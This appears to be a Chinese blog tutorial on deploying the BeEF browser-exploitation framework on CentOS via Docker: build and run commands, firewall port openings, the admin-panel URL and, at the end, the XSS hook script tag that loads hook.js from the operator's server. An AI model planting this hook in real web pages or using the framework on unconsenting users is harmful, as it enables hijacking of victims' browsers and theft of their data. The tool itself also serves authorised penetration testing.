系统相关
首页 > 系统相关> > centos安装beefxss-docker

centos安装beefxss-docker

作者:互联网

1、当然了先安装docker、docker-compose、git、等基本环境(其实主要是ruby不好整还不如用docker)

2、最重要的部分参照这个官方介绍:

https://github.com/beefproject/beef/wiki/Installation#source

看懂了下面这部分基本上就可以了

 

 2-1、拉下代码之后设置这里:config.yaml

 

 2-2、之后创建镜像: 当然了这里很重要的地方就是需要去解决报错ruby的问题,我这边是重新yum update之后更新

docker build -t beef .

 

 成功之后就这样了:

 

 2-3、运行容器,当然如果需要后台运行下面的命令加上 -d

  # If you'd prefer the container to run backgrounded/detached just add the -d tag to the command below
docker run -p 3000:3000 -p 6789:6789 -p 61985:61985 -p 61986:61986 --name beef beef

开放相关端口:

firewall-cmd --zone=public --add-port=61986/tcp --permanent
firewall-cmd --zone=public --add-port=61986/udp --permanent

等待beEF部署:

 

 之后直接进你的后台,快乐玩耍吧:

http://IP:3000/ui/authentication

 

 

 当然你的hook是这个:

<script src="http://IP:3000/hook.js"></script>

标签:centos,beef,--,beefxss,add,3000,docker,61986
来源: https://www.cnblogs.com/0x200/p/16380101.html